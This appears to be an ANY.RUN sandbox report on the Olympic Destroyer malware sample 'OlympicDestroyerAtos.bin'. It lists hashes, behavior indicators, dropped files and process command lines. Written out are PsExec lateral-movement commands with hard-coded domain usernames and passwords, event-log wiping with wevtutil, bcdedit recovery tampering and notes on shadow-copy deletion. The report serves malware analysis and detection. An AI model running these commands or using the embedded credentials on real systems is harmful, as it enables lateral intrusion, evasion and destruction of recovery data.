File name:

OlympicDestroyerAtos.bin

Full analysis: https://app.any.run/tasks/405556b5-6d57-4b59-9676-b8933a4bae23
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: February 08, 2025, 18:11:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
psexec
stealer
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:

EC724EF33521C4C2965DE078E36C8277

SHA1:

D7B6602967EEA9806EE8A91284E616CFDF5F255D

SHA256:

28858CC6E05225F7D156D1C6A21ED11188777FA0A752CB7B56038D79A88627CC

SSDEEP:

98304:wV+yfQYJRSOT8FJHgZ5wnMOZg4VpKsG/srEEQ4017Go2M9mvtUqMDjO0YdQXQ4:+esr7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Steals credentials from Web Browsers

      • noope.exe (PID: 116)

    • Actions looks like stealing of personal data

      • noope.exe (PID: 116)

    • Deletes shadow copies

      • cmd.exe (PID: 2276)
      • cmd.exe (PID: 2260)

    • Using BCDEDIT.EXE to modify recovery options

      • cmd.exe (PID: 1868)

  • SUSPICIOUS

    • Reads the Internet Settings

      • noope.exe (PID: 116)
      • _otf.exe (PID: 2000)
      • _otf.exe (PID: 1780)
      • _otf.exe (PID: 1180)
      • _otf.exe (PID: 3372)
      • _otf.exe (PID: 3032)
      • _otf.exe (PID: 3368)
      • _otf.exe (PID: 3028)
      • _otf.exe (PID: 600)
      • _otf.exe (PID: 3536)
      • _otf.exe (PID: 3460)
      • _otf.exe (PID: 3528)
      • _otf.exe (PID: 3720)
      • _otf.exe (PID: 3704)
      • _otf.exe (PID: 3412)
      • _otf.exe (PID: 3860)
      • _otf.exe (PID: 3928)
      • _otf.exe (PID: 3924)
      • _otf.exe (PID: 4076)
      • _otf.exe (PID: 2448)
      • _otf.exe (PID: 1676)
      • _otf.exe (PID: 188)

    • Searches for installed software

      • noope.exe (PID: 116)

    • Executable content was dropped or overwritten

      • OlympicDestroyerAtos.bin.exe (PID: 1916)

    • PSEXEC has been detected

      • _otf.exe (PID: 1780)
      • _otf.exe (PID: 1232)
      • _otf.exe (PID: 188)
      • _otf.exe (PID: 2000)
      • _otf.exe (PID: 3372)
      • _otf.exe (PID: 1180)
      • _otf.exe (PID: 3032)
      • _otf.exe (PID: 3368)
      • _otf.exe (PID: 3028)
      • _otf.exe (PID: 600)
      • _otf.exe (PID: 3536)
      • _otf.exe (PID: 3460)
      • _otf.exe (PID: 3528)
      • _otf.exe (PID: 3720)
      • _otf.exe (PID: 3704)
      • _otf.exe (PID: 3412)
      • _otf.exe (PID: 3860)
      • _otf.exe (PID: 3924)
      • _otf.exe (PID: 3928)
      • _otf.exe (PID: 4076)
      • _otf.exe (PID: 2448)
      • _otf.exe (PID: 1676)
      • _otf.exe (PID: 2180)

    • Uses WEVTUTIL.EXE to cleanup log

      • cmd.exe (PID: 2620)
      • cmd.exe (PID: 1288)

    • Starts CMD.EXE for commands execution

      • _ksf.exe (PID: 1800)

  • INFO

    • Checks supported languages

      • OlympicDestroyerAtos.bin.exe (PID: 1916)
      • noope.exe (PID: 116)
      • wmpnscfg.exe (PID: 1332)
      • _ksf.exe (PID: 1800)
      • _otf.exe (PID: 1232)
      • _otf.exe (PID: 1780)
      • _otf.exe (PID: 188)
      • _otf.exe (PID: 3372)
      • _otf.exe (PID: 1180)
      • _otf.exe (PID: 2000)
      • _otf.exe (PID: 3368)
      • _otf.exe (PID: 3032)
      • _otf.exe (PID: 3028)
      • _otf.exe (PID: 600)
      • _otf.exe (PID: 3536)
      • _otf.exe (PID: 3460)
      • _otf.exe (PID: 3528)
      • _otf.exe (PID: 3720)
      • _otf.exe (PID: 3704)
      • _otf.exe (PID: 3928)
      • _otf.exe (PID: 3412)
      • _otf.exe (PID: 3860)
      • _otf.exe (PID: 3924)
      • _otf.exe (PID: 4076)
      • _otf.exe (PID: 2448)
      • _otf.exe (PID: 1676)
      • _otf.exe (PID: 2180)

    • Manual execution by a user

      • wmpnscfg.exe (PID: 1332)

    • Reads the computer name

      • OlympicDestroyerAtos.bin.exe (PID: 1916)
      • wmpnscfg.exe (PID: 1332)
      • noope.exe (PID: 116)
      • _ksf.exe (PID: 1800)
      • _otf.exe (PID: 188)
      • _otf.exe (PID: 1232)
      • _otf.exe (PID: 1780)
      • _otf.exe (PID: 3372)
      • _otf.exe (PID: 2000)
      • _otf.exe (PID: 1180)
      • _otf.exe (PID: 3032)
      • _otf.exe (PID: 3368)
      • _otf.exe (PID: 3028)
      • _otf.exe (PID: 600)
      • _otf.exe (PID: 3536)
      • _otf.exe (PID: 3460)
      • _otf.exe (PID: 3528)
      • _otf.exe (PID: 3720)
      • _otf.exe (PID: 3704)
      • _otf.exe (PID: 3412)
      • _otf.exe (PID: 3860)
      • _otf.exe (PID: 3924)
      • _otf.exe (PID: 3928)
      • _otf.exe (PID: 4076)
      • _otf.exe (PID: 2448)
      • _otf.exe (PID: 1676)
      • _otf.exe (PID: 2180)

    • Create files in a temporary directory

      • OlympicDestroyerAtos.bin.exe (PID: 1916)
      • noope.exe (PID: 116)

    • Reads the machine GUID from the registry

      • OlympicDestroyerAtos.bin.exe (PID: 1916)

    • The sample compiled with english language support

      • OlympicDestroyerAtos.bin.exe (PID: 1916)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2017:12:27 11:39:22+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 121856
InitializedDataSize: 1743872
UninitializedDataSize: -
EntryPoint: 0xb516
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
100
Monitored processes
39
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start olympicdestroyeratos.bin.exe wmpnscfg.exe no specs noope.exe _ksf.exe no specs cmd.exe no specs vssadmin.exe no specs THREAT _otf.exe no specs cmd.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs wbadmin.exe no specs cmd.exe no specs bcdedit.exe no specs bcdedit.exe no specs cmd.exe no specs wevtutil.exe no specs cmd.exe no specs wevtutil.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs THREAT _otf.exe no specs _otf.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
116 123 \\.\pipe\B7324CD9-1C05-4F77-A566-AFE4FBB551F1C:\Users\admin\AppData\Local\Temp\noope.exe
OlympicDestroyerAtos.bin.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
188C:\Users\admin\AppData\Local\Temp\_otf.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\admin\AppData\Local\Temp\_mju.exe"C:\Users\admin\AppData\Local\Temp\_otf.exe
OlympicDestroyerAtos.bin.exe
User:
admin
Company:
Sysinternals - www.sysinternals.com
Integrity Level:
MEDIUM
Description:
Execute processes remotely
Exit code:
6
Version:
2.2
444bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures C:\Windows\System32\bcdedit.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Boot Configuration Data Editor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
600C:\Users\admin\AppData\Local\Temp\_otf.exe \\192.168.100.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\admin\AppData\Local\Temp\_mju.exe"C:\Users\admin\AppData\Local\Temp\_otf.exe
OlympicDestroyerAtos.bin.exe
User:
admin
Company:
Sysinternals - www.sysinternals.com
Integrity Level:
MEDIUM
Description:
Execute processes remotely
Exit code:
6
Version:
2.2
660wevtutil.exe cl SystemC:\Windows\System32\wevtutil.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Eventing Command Line Utility
Exit code:
5
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1180C:\Users\admin\AppData\Local\Temp\_otf.exe \\192.168.100.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\admin\AppData\Local\Temp\_mju.exe"C:\Users\admin\AppData\Local\Temp\_otf.exe
OlympicDestroyerAtos.bin.exe
User:
admin
Company:
Sysinternals - www.sysinternals.com
Integrity Level:
MEDIUM
Description:
Execute processes remotely
Exit code:
6
Version:
2.2
1232C:\Users\admin\AppData\Local\Temp\_otf.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\admin\AppData\Local\Temp\_mju.exe"C:\Users\admin\AppData\Local\Temp\_otf.exe
OlympicDestroyerAtos.bin.exe
User:
admin
Company:
Sysinternals - www.sysinternals.com
Integrity Level:
MEDIUM
Description:
Execute processes remotely
Version:
2.2
1288C:\Windows\system32\cmd.exe /c wevtutil.exe cl SecurityC:\Windows\System32\cmd.exe_ksf.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1332"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
1600wevtutil.exe cl SecurityC:\Windows\System32\wevtutil.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Eventing Command Line Utility
Exit code:
5
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
8 338
Read events
8 312
Write events
26
Delete events
0

Modification events

(PID) Process:(188) _otf.exeKey:HKEY_CURRENT_USER\Software\Sysinternals\PsExec
Operation:writeName:EulaAccepted
Value:
1
(PID) Process:(1780) _otf.exeKey:HKEY_CURRENT_USER\Software\Sysinternals\PsExec
Operation:writeName:EulaAccepted
Value:
1
(PID) Process:(116) noope.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(116) noope.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(116) noope.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1232) _otf.exeKey:HKEY_CURRENT_USER\Software\Sysinternals\PsExec
Operation:writeName:EulaAccepted
Value:
1
(PID) Process:(2000) _otf.exeKey:HKEY_CURRENT_USER\Software\Sysinternals\PsExec
Operation:writeName:EulaAccepted
Value:
1
(PID) Process:(3372) _otf.exeKey:HKEY_CURRENT_USER\Software\Sysinternals\PsExec
Operation:writeName:EulaAccepted
Value:
1
(PID) Process:(1180) _otf.exeKey:HKEY_CURRENT_USER\Software\Sysinternals\PsExec
Operation:writeName:EulaAccepted
Value:
1
(PID) Process:(3032) _otf.exeKey:HKEY_CURRENT_USER\Software\Sysinternals\PsExec
Operation:writeName:EulaAccepted
Value:
1
Executable files
5
Suspicious files
1
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
116noope.exeC:\Users\admin\AppData\Local\Temp\chr7FF0.tmpbinary
MD5:52E51471E9281235323F633CD0DEA56C
SHA256:147F3137B387FE4FBE3215B7864568404580A799D031009FE9C718F4C2EF87D0
1916OlympicDestroyerAtos.bin.exeC:\Users\admin\AppData\Local\Temp\noope.exeexecutable
MD5:68970B2CD5430C812BEF5B87C1ADD6EA
SHA256:E4E1E3C44E01C60FD433C6283BD8CD15A9941E1CBAAD72E6409CC92E2E91263E
1916OlympicDestroyerAtos.bin.exeC:\Users\admin\AppData\Local\Temp\_otf.exeexecutable
MD5:27304B246C7D5B4E149124D5F93C5B01
SHA256:3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF
1916OlympicDestroyerAtos.bin.exeC:\Users\admin\AppData\Local\Temp\_ksf.exeexecutable
MD5:3C0D740347B0362331C882C2DEE96DBF
SHA256:AE9A4E244A9B3C77D489DEE8AEAF35A7C3BA31B210E76D81EF2E91790F052C85
1916OlympicDestroyerAtos.bin.exeC:\Users\admin\AppData\Local\Temp\_mju.exeexecutable
MD5:EC724EF33521C4C2965DE078E36C8277
SHA256:28858CC6E05225F7D156D1C6A21ED11188777FA0A752CB7B56038D79A88627CC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
30
DNS requests
7
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1108
svchost.exe
224.0.0.252:5355
whitelisted
4
System
192.168.100.2:137
whitelisted
668
svchost.exe
192.168.100.2:135
whitelisted
192.168.100.2:445
whitelisted
192.168.100.2:139
whitelisted
192.168.100.2:80
whitelisted

DNS requests

Domain
IP
Reputation
252.0.0.224.in-addr.arpa
unknown
22.0.0.224.in-addr.arpa
unknown
2.100.168.192.in-addr.arpa
whitelisted
255.100.168.192.in-addr.arpa
unknown
igmp.mcast.net
  • 224.0.0.22
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
OlympicDestroyerAtos.bin